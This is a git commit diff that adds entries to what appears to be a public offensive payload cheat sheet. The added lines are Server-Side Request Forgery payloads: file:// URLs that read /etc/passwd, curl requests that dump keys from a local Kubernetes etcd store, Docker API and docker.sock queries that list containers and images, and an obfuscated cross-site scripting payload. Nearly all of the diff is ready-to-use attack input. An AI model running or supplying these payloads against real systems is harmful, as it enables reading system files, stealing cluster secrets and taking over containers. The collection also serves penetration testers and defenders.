SSRF Docker & Kubernetes

patch-1
Swissky 2018-08-19 16:32:26 +02:00
parent e11339e669
commit cfbe1a4469
2 changed files with 29 additions and 0 deletions

View File

@ -153,6 +153,13 @@ List:
## SSRF via URL Scheme
File Wrapper
```powershell
file:///etc/passwd
file://\/\/etc/passwd
```
Dict Wrapper
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
@ -396,6 +403,27 @@ http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
### SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
```powershell
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
### SSRF URL for Docker
```powershell
http://127.0.0.1:2375/v1.24/containers/json
Simple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
## Thanks to
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)

View File

@ -682,6 +682,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
Exotic payloads
```javascript
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>